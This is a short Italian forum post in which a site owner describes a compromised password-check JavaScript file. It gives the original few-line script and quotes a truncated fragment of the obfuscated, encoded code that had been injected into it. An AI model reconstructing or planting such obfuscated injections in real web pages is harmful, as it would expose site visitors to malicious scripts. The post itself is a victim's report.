00 05/02/2009 18:04
Lo scritp sembra essere stato modificato.
Adesso è "pulito" e quindi non si dovrebbero più riscontrare segnalazioni strane...
Quello che non capisco è come sia possibile che uno script "innocente" (serve a verificare la validità della password di accesso alla "sezione riservata" del sito), composto solo di poche righe, possa essere stato modificato, con l'inserimento di informazioni estranee....

Questo era lo script originale

// JavaScript Document
<!-- Start script
function check(name) {
var ext = ".htm";
if ((document.pswd.pswd.value == null) || (document.pswd.pswd.value == ''))
alert('Password Errata.');
else this.location.href = document.pswd.pswd.value + name + ext;
}
// end script -->
document.write('<script language="javascript"></script>');

In quello modificato c'era molta altra roba in più... decine di righe come queste:

$="Z63eZ3dZ22p.cZ2568arZ2543odeZ2541Z2574(0Z2529Z255e(Z25270x0Z2530Z2527+es)))Z253bZ257d}Z22;cbZ3dZ2273Z2563aZ2570eZ2528Z2564s)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;Z2569Z25Z22;czZ3dZ22Z2566unZ2563tioZ256e ....

Achille
[Modificato da Achille Lorenzi 05/02/2009 18:20]